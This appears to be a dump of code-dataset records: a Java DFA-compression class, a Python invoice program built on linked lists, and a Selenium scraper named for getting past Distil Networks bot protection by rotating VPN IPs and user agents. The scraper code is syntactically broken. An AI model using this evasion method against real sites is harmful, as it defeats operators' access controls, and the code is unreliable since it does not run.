.orElse(0);\n System.out.println(\"Max-of-single: \" + max);\n\n Dfa dfaSingleMin = minimizeHopcroft(convert(Nfa.union(nfasSingle)));\n System.out.println(\"Single-terminal-minimized: \" + dfaSingleMin.nodesCount());\n\n Dfa combined = convert(Nfa.union(nfas));\n System.out.println(\"Combined: \" + combined.nodesCount());\n Dfa dfaMin = minimizeHopcroft(combined);\n System.out.println(\"Minimized: \" + dfaMin.nodesCount());\n\n System.out.println(\"Minimized-cut: \" + (dfaMin.cutCount() + nfas.size()));\n\n Dfa modified = new ThompsonModified().run(nfas);\n System.out.println(\"ThompsonModified: \" + modified.nodesCount());\n Utils.writeTo(\"./output/graph/result.txt\", modified.print(Dfa.PrintingMode.SERIALIZE));\n\n// Dfa modifiedMin = minimizeHopcroft(modified);\n compress(modified);\n System.out.println(\"ThompsonModifiedHeuristic: \" + modified.nodesCount());\n\n new RecursiveCompressorDynamic().compress(modified);\n System.out.println(\"HeuristicThenRecursive: \" + modified.nodesCount());\n\n Dfa modifiedCopy = new ThompsonModified().run(nfas);\n new RecursiveCompressorDynamic().compress(modifiedCopy);\n System.out.println(\"ThompsonModifiedRecursive: \" + modifiedCopy.nodesCount());\n int x = modifiedCopy.nodesCount();\n compress(modifiedCopy);\n assert x == modifiedCopy.nodesCount();\n\n// modifiedMinCopy.print();\n\n System.out.println();\n System.out.flush();\n }\n\n public static void processGroupDependent(List<String> rules) {\n System.out.println(\"Total \" + rules.size() + \" rules\");\n\n List<Nfa> nfas = rules.parallelStream()\n .map(Main::buildNfa)\n .collect(Collectors.toList());\n for (int i = 0; i < nfas.size(); i++) {\n nfas.get(i).close(i);\n }\n\n // Nfa:\n// List<Nfa> nfasSingle = rules.parallelStream()\n// .map(Main::buildNfa)\n// .peek(nfa -> nfa.close(1))\n// .collect(Collectors.toList());\n\n // Dfa:\n// Dfa dfaSingleMin = minimizeHopcroft(convert(Nfa.union(nfasSingle)));\n// System.out.println(\"Single-terminal-minimized: \" + dfaSingleMin.nodesCount());\n\n Dfa combined = convert(Nfa.union(nfas));\n 
System.out.println(\"Combined: \" + combined.nodesCount());\n Dfa dfaMin = minimizeHopcroft(combined);\n System.out.println(\"Minimized: \" + dfaMin.nodesCount());\n\n System.out.println();\n System.out.flush();\n }\n}\n"
},
{
"alpha_fraction": 0.47398316860198975,
"alphanum_fraction": 0.47558754682540894,
"avg_line_length": 38.83074188232422,
"blob_id": "dbd698d169b86a3304f47cd61f660ebda64128c8",
"content_id": "4a2136f52afe8b217647796a8a424138c3a14745",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 23062,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 579,
"path": "/src/main/java/automaton/algo/compressor/recursive/RecursiveCompressorDynamic.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.recursive;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport automaton.transition.Transitions;\nimport main.io.Static;\nimport util.IntMonitor;\nimport util.Pair;\nimport util.Utils;\n\nimport java.util.*;\nimport java.util.logging.Logger;\nimport java.util.stream.Collectors;\n\npublic class RecursiveCompressorDynamic {\n private Dfa dfa;\n private Map<Node, Integer> index;\n private ArrayList<Node> nodes;\n private byte[][] distinct; // 1 <-> dependent, 0 <-> maybe independent\n private MergeDsu mergeQueue;\n\n List<HashMap<Character, Set<Integer>>> incident;\n private Set<Integer> nonMerged;\n// private List<Set<Integer>> dependent; // TODO: dependent -> independent?\n\n private IntMonitor __debugSizeMonitor = new IntMonitor(\"Nodes remaining\", 100, IntMonitor.Mode.LINEAR);\n\n private boolean areDependent(int i, int j) {\n if (i < j) {\n return areDependent(j, i);\n }\n return distinct[i][j] == 1;\n// return dependent.get(i).contains(j);\n }\n\n private void setDependent(int i, int j) {\n if (i < j) {\n setDependent(j, i);\n }\n// dependent.get(i).add(j);\n// dependent.get(j).add(i);\n distinct[i][j] = 1;\n// distinct[j][i] = 1;\n }\n\n private void clearDependence(int i) { // Non-merged only\n for (int id : nonMerged) {\n distinct[Integer.max(id, i)][Integer.min(id, i)] = 0;\n }\n }\n\n private void buildMatrix() {\n nodes = new ArrayList<>(dfa.allNodes());\n index = new HashMap<>();\n int counter = 0;\n for (Node node : nodes) {\n if (node != null) {\n index.put(node, counter);\n }\n counter++;\n }\n\n nonMerged = new HashSet<>(nodes.size());\n for (int i = 0; i < nodes.size(); i++) {\n if (nodes.get(i) != null) {\n nonMerged.add(i);\n }\n }\n\n Map<Node, Set<Pair<Character, Node>>> mp = new HashMap<>();\n for (Node node : nodes) {\n// if (node != null) {\n mp.put(node, new HashSet<>());\n// }\n }\n for (Node node : nodes) {\n if (node != null) {\n node.getEdges().forEach((c, target) -> {\n mp.get(target).add(new Pair<>(c, node));\n });\n }\n }\n\n distinct = new byte[nodes.size()][nodes.size()];\n\n Queue<Pair<Integer, Integer>> queue = new ArrayDeque<>();\n\n for (int i = 0; i < nodes.size(); i++) {\n if (!nodes.get(i).isTerminal()) {\n continue;\n }\n assert nodes.get(i).getTerminal().size() == 1;\n for (int j = 0; j < i; j++) {\n if (nodes.get(i).isTerminal() && nodes.get(j).isTerminal()) {\n assert !nodes.get(i).getTerminal().equals(nodes.get(j).getTerminal());\n setDependent(i, j);\n queue.add(new Pair<>(i, j));\n }\n }\n }\n\n incident = new ArrayList<>();\n for (int i = 0; i < nodes.size(); i++) {\n incident.add(new HashMap<>());\n }\n for (int i = 0; i < nodes.size(); i++) {\n int finalI = i;\n mp.get(nodes.get(i)).forEach(pair -> {\n incident.get(finalI).putIfAbsent(pair.getFirst(), new HashSet<>());\n incident.get(finalI).get(pair.getFirst()).add(index.get(pair.getSecond()));\n });\n }\n\n traverseDependence(queue);\n }\n\n private void updateMatrix() {\n Queue<Pair<Integer, Integer>> queue = new ArrayDeque<>();\n\n List<Integer> nonMergedList = new ArrayList<>(nonMerged);\n for (int i = 0; i < nonMergedList.size(); i++) {\n for (int j = 0; j < i; j++) {\n int realI = nonMergedList.get(i);\n int realJ = nonMergedList.get(j);\n if (areDependent(realI, realJ)) {\n queue.add(new Pair<>(realI, realJ));\n }\n }\n }\n\n traverseDependence(queue);\n }\n\n\n private void printDependence() {\n System.out.print(\"Dependence:\\n \");\n for (int i = 0; i < nodes.size(); i++) {\n if (nodes.get(i) != null) {\n System.out.print(\" 
\" + i);\n }\n }\n System.out.println();\n for (int i = 0; i < nodes.size(); i++) {\n if (nodes.get(i) != null) {\n System.out.print(i);\n for (int j = 0; j < nodes.size(); j++) {\n if (nodes.get(j) != null) {\n int s = areDependent(i, j) ? 1 : 0;\n System.out.print(\" \" + s);\n }\n }\n System.out.println();\n }\n }\n System.out.println();\n }\n\n private void printInfo() {\n System.out.println(\"Total \" + nodes.size() + \" nodes:\");\n for (int i = 0; i < nodes.size(); i++) {\n System.out.print(Utils.objCode(nodes.get(i)) + \"/\" + i + \": \");\n Node node = nodes.get(i);\n if (node == null) {\n System.out.print(\"null\");\n } else {\n Map<Character, Node> edges = node.getEdges();\n if (edges == null) {\n System.out.print(\"null\");\n } else {\n if (edges.size() > 10) {\n System.out.print(\"r\" + edges.size() + \" \");\n }\n edges.forEach((c, target) -> {\n if (c >= 'a' && c <= 'f') {\n System.out.print(\"<\" + c + \", \" + Utils.objCode(target) + \"/\" + index.get(target) + \"> \");\n }\n });\n }\n }\n System.out.println();\n }\n System.out.println(\"Incident:\");\n for (int i = 0; i < nodes.size(); i++) {\n System.out.println(i + \":\");\n if (incident.get(i) == null) {\n System.out.println(\" null\");\n } else {\n for (char c = 'a'; c <= 'f'; c++) {\n Set<Integer> incidentCurrent = incident.get(i).get(c);\n if (incidentCurrent != null) {\n System.out.print(\" \" + c + \": <\");\n incidentCurrent.forEach(id -> System.out.print(id + \" \"));\n System.out.println(\">\");\n }\n }\n }\n }\n System.out.print(\"Non-merged: \");\n nonMerged.forEach(id -> System.out.print(id + \" \"));\n System.out.println();\n System.out.println(\"Start: \" + Utils.objCode(dfa.getStart()) + \" / \" + index.get(dfa.getStart()));\n\n System.out.print(\"Index: \");\n index.forEach((node, id) -> {\n System.out.print(\"<\" + Utils.objCode(node) + \", \" + id + \"> \");\n });\n System.out.println();\n\n System.out.print(\"Nodes: \");\n nodes.forEach(node -> System.out.print(Utils.objCode(node) + \" \"));\n System.out.println();\n System.out.println();\n }\n\n\n private boolean runMergeAt(int i, int j) {\n mergeQueue = new MergeDsu();\n mergeQueue.insertPair(i, j);\n if (!mergeQueue.processQueue()) {\n return false;\n }\n mergeQueue.applyPartition();\n return true;\n }\n\n private void traverseDependence(Queue<Pair<Integer, Integer>> queue) {\n while (!queue.isEmpty()) { // TODO: replace with function & synchronized queue?\n Pair<Integer, Integer> cur = queue.remove();\n int i = cur.getFirst();\n int j = cur.getSecond();\n incident.get(i).keySet().stream()\n .filter(incident.get(j)::containsKey)\n .forEach(c -> {\n incident.get(i).get(c).forEach(a -> {\n incident.get(j).get(c).forEach(b -> {\n if (!areDependent(a, b)) {\n setDependent(a, b);\n queue.add(new Pair<>(a, b));\n }\n });\n });\n });\n }\n }\n\n private boolean tryShrink() {\n List<Integer> nonMergedList = new ArrayList<>(nonMerged);\n for (int i = 0; i < nonMergedList.size(); i++) {\n for (int j = 0; j < i; j++) { // TODO: FASTER pairs hashset?\n int realI = nonMergedList.get(i);\n int realJ = nonMergedList.get(j);\n if (!areDependent(realI, realJ)) {\n boolean success = runMergeAt(realI, realJ);\n if (!success) {\n setDependent(realI, realJ);\n Queue<Pair<Integer, Integer>> queue = new ArrayDeque<>();\n queue.add(new Pair<>(realI, realJ));\n traverseDependence(queue);\n } else {\n // TODO: smart continue?\n return true;\n }\n }\n }\n }\n return false;\n }\n\n public void compress(Dfa dfa) {\n dfa.close();\n this.dfa = dfa;\n\n buildMatrix();\n boolean 
updated = true;\n while (updated) {\n updateMatrix();\n __debugSizeMonitor.update(dfa.nodesCount());\n if (Static.DEBUG_RUN) dfa.print(index);\n if (Static.DEBUG_RUN) printDependence();\n updated = tryShrink();\n }\n }\n\n private class MergeDsu {\n private Map<Integer, Component> componentsMap = new HashMap<>();\n private Queue<Pair<Integer, Integer>> queue = new ArrayDeque<>();\n\n public MergeDsu() {\n }\n\n private Component getComponent(int id) {\n if (componentsMap.containsKey(id)) {\n return componentsMap.get(id);\n }\n Component newComponent = new Component(id);\n componentsMap.put(id, newComponent);\n return newComponent;\n }\n\n private boolean inComponent(int id) {\n return componentsMap.containsKey(id);\n }\n\n private void applyPartition() { // TODO: reduce overhead for single-node components?\n List<Component> components = componentsMap.values().stream()\n .distinct()\n .collect(Collectors.toList());\n\n int nodesSavedSize = nodes.size();\n\n HashMap<Component, Integer> componentsIndex = new HashMap<>();\n HashMap<Component, Integer> componentsNewIndex = new HashMap<>();\n HashMap<Integer, Integer> componentsTransfer = new HashMap<>();\n for (Component component : components) { // Add new nodes\n Node newNode = new Node();\n int newNodeId = nodes.size();\n nodes.add(newNode);\n index.put(newNode, newNodeId);\n// nonMerged.add(newNodeId); // later\n incident.add(new HashMap<>()); // TODO: do not need?\n// dependent.add(new HashSet<>());\n\n componentsIndex.put(component, newNodeId);\n int newId = component.entries.stream().min(Integer::compareTo).get();\n componentsNewIndex.put(component, newId);\n componentsTransfer.put(newNodeId, newId);\n }\n\n if (Static.DEBUG_RUN) {\n System.err.println(\"Merging:\");\n for (Component component : components) {\n System.err.print(componentsIndex.get(component) + \": \");\n String s = component.entries.stream().map(Objects::toString).collect(Collectors.joining(\" \"));\n System.err.println(s);\n }\n }\n\n // Fill components with edges (orig index)\n for (Component component : components) {\n Node newNode = nodes.get(componentsIndex.get(component));\n newNode.setEdges(component.mergedEdges.entrySet().stream()\n .collect(Collectors.toMap(Map.Entry::getKey, entry -> nodes.get(entry.getValue()))));\n }\n\n // Fill incident (temporary index)\n for (Component component : components) {\n int componentId = componentsIndex.get(component);\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n char finalC = c;\n Set<Integer> newIncident = component.entries.stream()\n .flatMap(id -> incident.get(id).getOrDefault(finalC, Collections.emptySet()).stream())\n .map(id -> inComponent(id) ? componentsIndex.get(getComponent(id)) : id)\n .collect(Collectors.toSet());\n if (newIncident.size() > 0) {\n incident.get(componentId).put(c, newIncident);\n }\n }\n }\n\n // Update incidents for non-components (final)\n for (Component component : components) {\n component.entries.forEach(entryId -> {\n nodes.get(entryId).getEdges().forEach((c, node) -> {\n int nodeId = index.get(node);\n if (!inComponent(nodeId)) {\n Map<Character, Set<Integer>> incidents = incident.get(nodeId);\n incidents.put(c, incidents.get(c).stream()\n .map(id -> inComponent(id) ? 
componentsNewIndex.get(getComponent(id)) : id)\n .collect(Collectors.toSet())\n );\n }\n });\n });\n }\n\n if (Static.DEBUG_RUN) printInfo();\n // Update edges for all (final index)\n for (Component component : components) {\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n char finalC = c;\n// component.entries.stream()\n incident.get(componentsIndex.get(component)).getOrDefault(finalC, Collections.emptySet())\n// .flatMap(id -> incident.get(id).getOrDefault(finalC, Collections.emptySet()).stream())\n .forEach(id -> {\n assert nodes.get(id) != null : id + \" \" + nodes.size();\n nodes.get(id).addEdge(finalC, nodes.get(componentsIndex.get(component)));\n });\n }\n }\n if (Static.DEBUG_RUN) printInfo();\n\n // TODO: remove solo nodes\n // TODO: anything more to remove?\n // TODO: remove mirror dependent\n\n // Calculate new dependence\n HashMap<Component, Set<Integer>> newDistincts = new HashMap<>();\n for (Component component : components) {\n Set<Integer> newDistinct = component.entries.stream()\n .flatMap(entry -> nonMerged.stream()\n .filter(id -> areDependent(entry, id)))\n .distinct()\n .map(id -> inComponent(id) ? componentsNewIndex.get(getComponent(id)) : id)\n .collect(Collectors.toSet());\n newDistincts.put(component, newDistinct);\n }\n\n // Clear dependence\n for (Component component : components) {\n int newId = componentsNewIndex.get(component);\n clearDependence(newId);\n }\n\n // Update start\n int startId = index.get(dfa.getStart());\n if (inComponent(startId)) {\n if (Static.DEBUG_RUN) System.err.println(\"Start transferred: \" + startId + \" -> \" + componentsIndex.get(getComponent(startId)));\n dfa.setStart(nodes.get(componentsIndex.get(getComponent(startId))));\n }\n\n // Move components\n for (Component component : components) {\n int newId = componentsNewIndex.get(component);\n int oldId = componentsIndex.get(component);\n index.remove(nodes.get(newId));\n newDistincts.get(component).forEach(id -> setDependent(newId, id));\n nodes.set(newId, nodes.get(oldId));\n index.put(nodes.get(oldId), newId);\n incident.set(newId, incident.get(oldId));\n }\n\n // Remove shrunk from nonMerged\n for (Component component : components) {\n component.entries.forEach(id -> {\n boolean __nonMergedRemoved = nonMerged.remove(id);\n assert __nonMergedRemoved;\n });\n }\n\n // Add component nodes\n for (Component component : components) {\n int newId = componentsNewIndex.get(component);\n nonMerged.add(newId);\n }\n\n // Update incident (final index)\n for (Component component : components) {\n int newComponentId = componentsNewIndex.get(component);\n HashMap<Character, Set<Integer>> incidentComponent = incident.get(newComponentId);\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n if (incidentComponent.containsKey(c)) {\n incidentComponent.put(c,\n incident.get(newComponentId).get(c).stream()\n .map(id -> componentsTransfer.getOrDefault(id, id))\n .collect(Collectors.toSet()));\n\n }\n }\n }\n\n // Destroy temporary nodes\n while (nodes.size() != nodesSavedSize) {\n int i = nodes.size() - 1;\n nodes.remove(i);\n incident.remove(i);\n }\n\n HashSet<Integer> newComponents = new HashSet<>(componentsNewIndex.values());\n for (Component component : components) { // Remove shrunk nodes\n component.entries.forEach(id -> {\n assert !nodes.get(id).isTerminal();\n if (!newComponents.contains(id)) {\n nodes.get(id).corrupt();\n\n Object __indexPrevious = index.remove(nodes.get(id));\n assert __indexPrevious != null;\n\n Object __nodesPrevious = nodes.set(id, null);\n assert __nodesPrevious 
!= null;\n\n incident.set(id, null);\n }\n });\n }\n\n if (Static.DEBUG_RUN) printInfo();\n assert nonMerged.stream().map(nodes::get).noneMatch(Objects::isNull);\n if (Static.DEBUG_RUN) System.err.println(nonMerged.stream().map(Objects::toString).collect(Collectors.joining(\" \")));\n if (Static.DEBUG_RUN) System.err.println(dfa.allNodes().stream().map(index::get).map(Objects::toString).collect(Collectors.joining(\" \")));\n assert nonMerged.stream().map(nodes::get).collect(Collectors.toSet()).equals(new HashSet<>(dfa.allNodes()));\n// dfa.print(index);\n assert nonMerged.stream().map(nodes::get)\n .flatMap(node -> node.getEdges().values().stream())\n .allMatch(node -> nonMerged.contains(index.get(node)));\n }\n\n private boolean processQueue() {\n while (!queue.isEmpty()) {\n Pair<Integer, Integer> cur = queue.remove();\n int i = Integer.max(cur.getFirst(), cur.getSecond());\n int j = Integer.min(cur.getFirst(), cur.getSecond());\n if (getComponent(i).merge(getComponent(j)) == null) {\n return false;\n }\n }\n return true;\n }\n\n public void insertPair(int i, int j) {\n if (Static.DEBUG_RUN) Logger.getGlobal().info(\"InsertPair:\" + i + \" \" + j);\n if (i == j || getComponent(i) == getComponent(j)) {\n return;\n }\n queue.add(new Pair<>(i, j));\n }\n\n private class Component {\n private Component head;\n private HashSet<Integer> entries;\n private Map<Character, Integer> mergedEdges;\n\n public Component(int n) {\n assert nonMerged.contains(n);\n assert nodes.get(n) != null : n + \" \" + nodes.size();\n entries = new HashSet<>();\n entries.add(n);\n mergedEdges = nodes.get(n).getEdges().entrySet().stream()\n .collect(Collectors.toMap(Map.Entry::getKey, entry -> index.get(entry.getValue())));\n }\n\n public Component getHead() {\n if (head == null) {\n return this;\n }\n return head = head.getHead();\n }\n\n public Component merge(Component other) {\n if (this == other) {\n return this;\n }\n// assert this != other;\n if (entries.size() < other.entries.size()) {\n return other.merge(this);\n }\n if (Static.DEBUG_RUN)\n System.err.println(\"Entries 1: \" + entries.stream().map(Objects::toString).collect(Collectors.joining(\" \")));\n if (Static.DEBUG_RUN)\n System.err.println(\"Entries 2: \" + other.entries.stream().map(Objects::toString).collect(Collectors.joining(\" \")));\n\n for (Integer id : entries) {\n for (Integer otherId : other.entries) {\n// if (distinct[Integer.max(id, otherId)][Integer.min(id, otherId)] == 1) {\n if (areDependent(id, otherId)) {\n return null;\n }\n }\n }\n\n for (Map.Entry<Character, Integer> entry : other.mergedEdges.entrySet()) {\n Character c = entry.getKey();\n Integer otherTarget = entry.getValue();\n if (mergedEdges.containsKey(c)) {\n Integer target = mergedEdges.get(c);\n mergeQueue.insertPair(otherTarget, target);\n } else {\n mergedEdges.put(c, otherTarget);\n }\n }\n other.entries.forEach(id -> componentsMap.put(id, this));\n entries.addAll(other.entries);\n other.head = this;\n if (Static.DEBUG_RUN)\n System.err.println(\"New component: \" + entries.stream().map(Objects::toString).collect(Collectors.joining(\" \")));\n return this;\n }\n }\n }\n}\n"
}
] | 36 |
jorgeluisztr/WebScrapper_Distil_Proof
|
https://github.com/jorgeluisztr/WebScrapper_Distil_Proof
|
3729745ef5237c3ccfe6c44e31aaa7c920cb196e
|
cb34cd86050b5c3cab529bc54c2c006d071459a8
|
9772e7ec807808a18164555cea7c3f605dee52ad
|
refs/heads/master
| 2020-06-08T08:16:29.537341 | 2019-06-22T05:25:24 | 2019-06-22T05:25:24 | 193,194,792 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.687747061252594,
"alphanum_fraction": 0.6892292499542236,
"avg_line_length": 31.14285659790039,
"blob_id": "48d4aa80e80aa12e7061313722e5b6c8fb95df5b",
"content_id": "165f516d5ff62ae749d5eb2c592eef925387c22e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2024,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 63,
"path": "/webscrapper.py",
"repo_name": "jorgeluisztr/WebScrapper_Distil_Proof",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom fake_useragent import UserAgent\nimport os\n\nopts = Options()\nopts.set_headless()\nassert opts.headless\n\n### In this example i will use a range of numbered pages to extract info\n\ndef scrapper(path, rangeofnumbered, iplist, geckopath, waitingtime = 1, interestedpattern, vpnon, vpnoff):\n\n '''\n\n This Web Scrapper is useful even with Distil Network protection\n\n\n :param path: str the domain of the page of interested\n :param rangeofnumbered: range Range of the numbered pages of interested\n :param dateobtained: tuple The data of interested\n :param iplist: list list of ips that you want to use\n :param geckopath: str the gecko driver path in your computer\n :param waitingtime: int seconds to wait for any visit default = 1\n :param interestedpattern: str the data that you are looking for\n :param vpnon: str command in shell to start vpn\n :param vpnoff: str command in shell to finished vpn\n :return:\n '''\n\n dataobtained =[]\n\n\n for i in rangeofnumbered:\n\n # Use a vpn to use a new ip for example vpn\n count = [0]\n os.system(vpnon + str(iplist[count]%len(iplist)))\n\n # Create the profile with user-agent random\n profile = webdriver.FirefoxProfile()\n profile.set_preference(\"general.useragent.override\", UserAgent().random)\n profile.update_preferences()\n\n # The page of interest\n interestedpath= path + rangeofnumbered\n\n # Create the web driver\n driver = webdriver.Firefox(executable_path=geckopath, options=opts,\n firefox_profile=profile)\n\n\n print(\"good connection for \" + interestedpath )\n driver.implicitly_wait(waitingtime) # seconds\n driver.get(interestedpath)\n\n lookfor = driver.find_elements_by_class_name(interestedpattern)\n for item in lookfor:\n dataobtained.append(item.text)\n\n os.system(vpnoff)\n\n return dataobtained"
}
] | 1 |
richardnarvaez/lista_enlazada_factura
|
https://github.com/richardnarvaez/lista_enlazada_factura
|
aae0ade0c26fbec69addb49b39433ec3a75330d6
|
5442fc23318ca2791bd89960a58a171cf4dbd5d6
|
1c2a072c02dad00329a2fb00c9b13dc42243e2cf
|
refs/heads/master
| 2020-09-04T04:51:07.306228 | 2019-11-06T20:58:09 | 2019-11-06T20:58:09 | 219,661,733 | 0 | 0 | null | 2019-11-05T05:04:11 | 2019-11-05T20:13:50 | 2019-11-06T20:58:10 |
Python
|
[
{
"alpha_fraction": 0.3925081491470337,
"alphanum_fraction": 0.3925081491470337,
"avg_line_length": 44.37036895751953,
"blob_id": "9215b5ef174029d5bb0f02aef1935a1039eed7d7",
"content_id": "366438c393b04dba6cad9d776f6a6509f2d7f2d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1228,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 27,
"path": "/models/Invoice.py",
"repo_name": "richardnarvaez/lista_enlazada_factura",
"src_encoding": "UTF-8",
"text": "\nclass Invoice:\n def __init__(self, _code=None, _names=None, _lastNames=None, _date=None, _phone=None, _total=None, _list=None):\n self.code = _code # Codigo unico generado\n self.date = _date # Fecha generada\n self.total = _total # Suma de todos los produtos\n self.list = _list # Lista con Productos\n self.names = _names\n self.phone = _phone\n\n def printInvoice(self):\n print(\"\\t******************* FACTURA *********************\")\n print(\"\\t*************************************************\\n\")\n print(\"\\tFactura: \", self.code)\n print(\"\\tFecha: \", self.date)\n print(\"\\tNombres: \", self.names)\n print(\"\\n\\t******************** ITEMS **********************\")\n print(\"\\t*************************************************\\n\")\n\n nodeItem = self.list.getHead()\n while nodeItem != None:\n nodeItem.data.printProduct()\n nodeItem = nodeItem.next\n\n print(\"\\n\\t*************************************************\")\n print(\"\\t TOTAL: \", self.total)\n print(\"\\t*************************************************\")\n print(\"\\t-------------------------------------------------\\n\\n\\n\")\n\n\n"
},
{
"alpha_fraction": 0.5028741955757141,
"alphanum_fraction": 0.5079328417778015,
"avg_line_length": 27.605262756347656,
"blob_id": "5610edac113a9e4767275a070cbd4e3bfd7b628a",
"content_id": "b895b1f406e8c4240171354874b70971c5adb547",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4350,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 152,
"path": "/main.py",
"repo_name": "richardnarvaez/lista_enlazada_factura",
"src_encoding": "UTF-8",
"text": "\n'''\n Autor: Richard Vinueza\n Curso: Estructura de Datos - ESPOCH\n Ejercicio: Funcionamiento basico de FACTURAS con LISTAS enlazadas (PYTHON 3)\n IDE: PyCharm\n Version: v0.0.1\n Ejecutar: python main.py\n'''\n\n# Importaciones\n# --------------------\nfrom List import List\nimport Utils as utils\nfrom datetime import date\n\n# Modelos\nfrom models.Invoice import Invoice\nfrom models.Product import Product\n# --------------------\n\n\n# -------------------- MENU PRINCIPAL\ndef menu():\n print(\"\\n----------------------------------------\")\n print(\" [ FACTURAS ] \")\n print(\"----------------------------------------\\n\")\n print(\" 1. REGISTRAR FACTURA \")\n print(\" 2. ELIMINAR FACTURA \")\n print(\" 3. MOSTRAR NODOS \")\n print(\" 4. MOSTRAR LISTADO DE FACURAS \")\n print(\" 5. SALIR \")\n return input(\"\\n Ingrese opción : \")\n\n\n# -------------------- REGISTRAR ITEM\ndef registrar_products():\n listProducts = List() # Lista que llevara todos los Productos\n total = 0\n op = \"\"\n while op != \"n\":\n try:\n print(\"Ingresar NUEVO Item\")\n item = Product()\n item.name = input(\"Como se llama el PRODUCTO: \")\n item.price = float(input(\"Cual es el precio (Formato: 9.85): \"))\n item.count = int(input(\"Cuant@s -> \" + item.name + \" quieres?: \"))\n item.total = item.count * item.price\n listProducts.add_at_front(item)\n total += item.total\n op = input(\"Desea ingresar otro producto? (y/n)\").lower()\n except ValueError:\n print(\"\\t-------------------------------------\")\n print(\"\\tOcurrio un error al ingresar el ITEM!\")\n print(\"\\tEL ULTIMO PRODUCTO NO FUE AGREGADO!\")\n print(\"\\t-------------------------------------\\n\\n\")\n op = 'y'\n\n return listProducts, total\n\n\n# -------------------- REGISTRAR FACTURA\ndef registrar_factura(lista):\n item_invoice = Invoice()\n print(\"\\n\\n\\t[ REGISTRO ]\")\n print(\"\\t--------------------\")\n print(\"\\n\\tDATOS DE FACTURA \")\n\n item_invoice.code = utils.getRandomID()\n item_invoice.date = date.today().strftime(\"%b-%d-%Y\")\n\n print(\"\\tCODIGO: \", item_invoice.code)\n print(\"\\tFECHA: \", item_invoice.date)\n item_invoice.names = input(\"\\tNOMBRES:\")\n item_invoice.phone = input(\"\\tTELEFONO:\")\n\n # Registramos los Productos, como es otra lista tenemos una funcion separada.\n iproduct = registrar_products()\n item_invoice.list = iproduct[0] # Devuelve la LISTA de Productos\n item_invoice.total = iproduct[1] # Devuelve el valor total de la compra\n lista.add_at_front(item_invoice)\n\n\n# -------------------- MOSTRAR FACTURA\ndef mostrar_facturas(list):\n node = list.getHead()\n while node != None:\n node.data.printInvoice()\n node = node.next\n\n\n# -------------------- MOSTRAR NODOS\ndef mostrar_nodos(list):\n list.print_list()\n\n\n# -------------------- ELIMINAR FACTURA\ndef eliminar_factura(list):\n cod = input(\"Ingresa el codigo de la FACTURA que deseas BORRAR: \")\n list.delete_node(cod)\n return list\n\n\n# -------------------- ACTUALIZAR FACTURA\ndef actualizar_factura(list):\n print(\"Proximamente\")\n\n\n# -------------------- FUNCION PRINCIPAL\ndef main():\n out = False\n list_facturas = List()\n\n while not out:\n\n option = menu()\n utils.clear()\n\n if option <= \"0\" or option >= \"6\":\n print(\"\\nINGRESE UNA OPCION VALIDA...\\n\")\n\n elif option == \"1\":\n registrar_factura(list_facturas)\n\n elif option == \"2\":\n if list_facturas.is_empty():\n utils.emptyData()\n else:\n eliminar_factura(list_facturas).print_list()\n\n elif option == \"3\":\n if 
list_facturas.is_empty():\n utils.emptyData()\n else:\n mostrar_nodos(list_facturas)\n\n elif option == \"4\":\n if list_facturas.is_empty():\n utils.emptyData()\n else:\n mostrar_facturas(list_facturas)\n\n if option != \"5\":\n utils.pause()\n else:\n print(\"Saliendo...\")\n out = True\n\n utils.clear()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.558987021446228,
"alphanum_fraction": 0.558987021446228,
"avg_line_length": 25.540983200073242,
"blob_id": "8897a7cf5867508b16be147fd4f17f6db58f0130",
"content_id": "405c3e8a22e2408169c0e3eebbc9a2e576fd0f76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1625,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 61,
"path": "/List.py",
"repo_name": "richardnarvaez/lista_enlazada_factura",
"src_encoding": "UTF-8",
"text": "\n# Creamos la clase NODO\nclass node:\n\n def __init__(self, _data=None, next=None):\n self.data = _data\n self.next = next\n\n\n# Creamos la clase List\nclass List:\n def __init__(self):\n self.head = None # Para enpezar el HEAD es nulo, por ende la sista esta VACIA\n\n # Método para agregar elementos al inicio\n def add_at_front(self, data):\n self.head = node(data, next=self.head)\n\n # Método para verificar si la estructura de datos esta vacia\n def is_empty(self):\n return self.head == None\n\n # Método para agregar elementos al final\n def add_at_end(self, data):\n if not self.head:\n self.head = node(data=data)\n return\n curr = self.headadd_at\n while curr.next:\n curr = curr.next\n curr.next = node(data=data)\n\n # Método para eleminar nodos\n def delete_node(self, key):\n curr = self.head\n prev = None\n while curr and curr.data.code != key:\n prev = curr\n curr = curr.next\n\n if prev is None:\n self.head = curr.next\n elif curr:\n prev.next = curr.next\n curr.next = None\n\n # Método para obtener el ultimo nodo\n def get_last_node(self):\n temp = self.head\n while (temp.next is not None):\n temp = temp.next\n return temp.data\n\n # Método para imprimir la lista de nodos\n def print_list(self):\n node = self.head\n while node != None:\n print(\"[\", node.data.code, \"]\", end=\" => \")\n node = node.next\n\n def getHead(self):\n return self.head"
},
{
"alpha_fraction": 0.4266054928302765,
"alphanum_fraction": 0.43119266629219055,
"avg_line_length": 19.809524536132812,
"blob_id": "afa786c4231d971eb55ec9449c4561408652cd70",
"content_id": "a785e35d875b90a42daee6cf229b238ab5563394",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 21,
"path": "/Utils.py",
